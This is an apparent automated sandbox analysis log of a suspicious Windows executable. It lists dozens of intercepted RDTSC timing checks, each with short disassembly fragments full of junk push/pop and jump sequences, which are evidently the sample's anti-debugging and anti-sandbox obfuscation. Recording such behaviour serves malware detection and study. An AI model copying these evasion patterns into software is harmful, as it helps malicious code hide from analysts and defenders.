Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F5D1 second address: 36F5D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36F8FD second address: 36F902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FB86 second address: 36FB9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A3h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FB9F second address: 36FBEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1879h 0x00000007 pushad 0x00000008 jmp 00007F7FDD3F1878h 0x0000000d jc 00007F7FDD3F1866h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F7FDD3F186Ah 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FEA6 second address: 36FEB6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7FDCFD2296h 0x00000008 jng 00007F7FDCFD2296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 36FEB6 second address: 36FEBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374F16 second address: 374F63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A4h 0x00000007 jg 00007F7FDCFD2298h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F7FDCFD229Ah 0x00000017 pushad 0x00000018 jmp 00007F7FDCFD22A7h 0x0000001d pushad 0x0000001e popad 0x0000001f jl 00007F7FDCFD2296h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374F63 second address: 374F69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3740F6 second address: 374102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37495C second address: 37496E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F186Eh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37496E second address: 374978 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374ACF second address: 374AF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1878h 0x00000007 jc 00007F7FDD3F186Eh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374AF3 second address: 374B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007F7FDCFD229Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374B0B second address: 374B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007F7FDD3F1866h 0x0000000c popad 0x0000000d pushad 0x0000000e jnl 00007F7FDD3F1866h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374B21 second address: 374B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F7FDCFD2296h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 374B2F second address: 374B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F7FDD3F1866h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 379628 second address: 37962D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37962D second address: 37963B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37963B second address: 37965B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7FDCFD22A6h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37965B second address: 379661 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 379661 second address: 37966E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7FDCFD2296h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 37966E second address: 37967E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F7FDD3F186Ah 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380101 second address: 380118 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F7FDCFD229Dh 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380118 second address: 38011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3806A3 second address: 3806C7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDCFD2296h 0x00000008 jmp 00007F7FDCFD229Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F7FDCFD229Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3806C7 second address: 3806E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1877h 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3806E8 second address: 3806ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 38097A second address: 38097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 38097E second address: 380984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380984 second address: 38098A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380AE4 second address: 380AE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380AE8 second address: 380AF2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C2F second address: 380C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C35 second address: 380C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C3B second address: 380C52 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F7FDCFD2296h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C52 second address: 380C70 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F7FDD3F1875h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 380C70 second address: 380C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F7FDCFD22A9h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 381655 second address: 38165F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7FDD3F1866h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 38165F second address: 381663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 381D9C second address: 381DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 381DA1 second address: 381DA6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3898FB second address: 3898FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3898FF second address: 389908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39A37A second address: 39A37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39A37E second address: 39A39D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F7FDCFD22A0h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39A53C second address: 39A540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DF02 second address: 39DF06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DF06 second address: 39DF22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F7FDD3F186Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F7FDD3F1866h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DF22 second address: 39DF28 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC35 second address: 39DC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC3B second address: 39DC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC41 second address: 39DC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F7FDD3F186Ah 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 39DC53 second address: 39DC6B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F7FDCFD22A1h 0x00000008 pop esi 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DA7 second address: 3A6DAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DAB second address: 3A6DCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F7FDCFD2296h 0x0000000e jmp 00007F7FDCFD22A4h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DCD second address: 3A6DD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DD3 second address: 3A6DF4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7FDCFD229Ch 0x00000008 ja 00007F7FDCFD2296h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F7FDCFD2296h 0x00000016 jmp 00007F7FDCFD229Bh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3A6DF4 second address: 3A6E1C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7FDD3F1866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F7FDD3F1870h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3ADB74 second address: 3ADB7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3ADB7A second address: 3ADB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F7FDD3F1866h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3ADB84 second address: 3ADB9D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7FDCFD2296h 0x00000008 js 00007F7FDCFD2296h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jnp 00007F7FDCFD2296h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3C6C second address: 3B3C76 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7FDD3F1866h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3C76 second address: 3B3C7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3DB8 second address: 3B3DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3DBE second address: 3B3DCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDCFD229Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3F21 second address: 3B3F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3F27 second address: 3B3F35 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7FDCFD2296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B3F35 second address: 3B3F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1873h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B40A6 second address: 3B40DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDCFD22A6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7FDCFD22A5h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B40DA second address: 3B40F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7FDD3F1877h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B40F7 second address: 3B40FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B4EE9 second address: 3B4EFF instructions: 0x00000000 rdtsc 0x00000002 js 00007F7FDD3F1866h 0x00000008 jng 00007F7FDD3F1866h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B4EFF second address: 3B4F15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 jl 00007F7FDCFD22BFh 0x0000000d pushad 0x0000000e jp 00007F7FDCFD2296h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B4F15 second address: 3B4F1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B8B45 second address: 3B8B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B8B49 second address: 3B8B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3B8B4F second address: 3B8B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F7FDCFD2296h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5A0 second address: 3BB5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F186Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5AE second address: 3BB5BF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 3BB5BF second address: 3BB5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90060 second address: 4E90064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90064 second address: 4E90072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90072 second address: 4E90099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov bx, si 0x00000008 popad 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7FDCFD22A9h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90099 second address: 4E900D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7FDD3F1871h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F7FDD3F186Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F7FDD3F1877h 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E900D8 second address: 4E90160 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7FDCFD22A8h 0x00000008 xor ecx, 5D52DEE8h 0x0000000e jmp 00007F7FDCFD229Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushfd 0x00000017 jmp 00007F7FDCFD22A8h 0x0000001c jmp 00007F7FDCFD22A5h 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ecx 0x00000024 jmp 00007F7FDCFD229Eh 0x00000029 xchg eax, ebx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F7FDCFD22A7h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AFBFHDBKJE.exe RDTSC instruction interceptor: First address: 4E90160 second address: 4E90202 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7FDD3F186Fh 0x00000009 sub si, C19Eh 0x0000000e jmp 00007F7FDD3F1879h 0x00000013 popfd 0x00000014 mov ebx, ecx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F7FDD3F186Dh 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 mov cx, B4F3h 0x00000025 jmp 00007F7FDD3F1878h 0x0000002a popad 0x0000002b mov ebx, dword ptr [ebp+10h] 0x0000002e pushad 0x0000002f push esi 0x00000030 mov edx, 4B985C10h 0x00000035 pop edi 0x00000036 mov cl, 06h 0x00000038 popad 0x00000039 push esp 0x0000003a pushad 0x0000003b mov dx, cx 0x0000003e mov dx, si 0x00000041 popad 0x00000042 mov dword ptr [esp], esi 0x00000045 pushad 0x00000046 mov ecx, 04CA2617h 0x0000004b mov di, si 0x0000004e popad 0x0000004f mov esi, dword ptr [ebp+08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7FDD3F1875h 0x00000059 rdtsc
